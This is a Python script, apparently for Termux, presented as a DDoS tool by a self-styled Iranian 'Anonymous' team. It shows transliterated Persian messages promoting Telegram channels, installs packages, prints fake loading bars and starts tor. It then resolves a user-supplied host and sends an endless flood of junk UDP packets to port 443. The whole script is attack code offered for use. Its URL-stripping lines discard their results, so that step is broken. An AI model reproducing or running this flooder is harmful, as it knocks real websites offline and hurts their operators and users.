import os
import time
import socket

print("Heloo my frind")
time.sleep(4)
os.system("clear")
print("start")
time.sleep(5)
os.system("clear")
print("ma teme hastem ke amneyat mardom ra baga mibrem va dozd hay majaze ra az beyn mebrem va dozd ha ra be shoma moarfe miknim va ma moshkel darem ba telewebion va movafagh ham shodem bargheye chez ha to ain kaanal ha @iranAnonymos20181 va @homxcvbn90000 tamam khoda nagahdar")
time.sleep(30)
os.system("clear")
print("hala ye ddos ham braton gozashtam hal koned")
time.sleep(4)
os.system("clear")
time.sleep(10)

red='\033[31m'
green='\033[32m'
os.system("pkg install python -y")
os.system("pkg install python2 -y")
os.system("pkg install python3 -y ")
os.system("pkg install figlet -y ")
os.system("clear")
os.system("toilet -f mono12 -F gay DDOS")
print(f"{green}==================================")
print(" made by anonymos ")
print(" my telegram id: @.... ")
print( "   =====================================")
target = input(f"{green} : ")
target.replace("http://", "")
target.replace("https://","")
target.replace("www.","")
ip = socket.gethostbyname(target)
port = 443
joker = "DDOSjsjsjjdjdjdjdjjjjjjjjjiiiiiiiopppkkkkjjjjjhhhbbbbgbvvvvvvvvvvvvhhyggggh"
os.system("clear")
os.system("toilet -f mono12 LOADING | lolcat")
print("chek{... }5%")
time.sleep(1)
print("secorote{..... }10%")
time.sleep(2)
print("Loading{......... }40%")
time.sleep(3)
print("amade saze {............. }90%")
time.sleep(4)
print("goooooooooo{....................100%")
time.sleep(6)
print("please    whit")
time.sleep(4)
os.system("tor")
time.sleep(8)
os.system("clear")
os.system("figlet Attack_Starting")
while True:
     sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
     sock.sendto(bytes(joker,"UTF-8"), (ip,port))
     print(port,"... packet to ...",ip)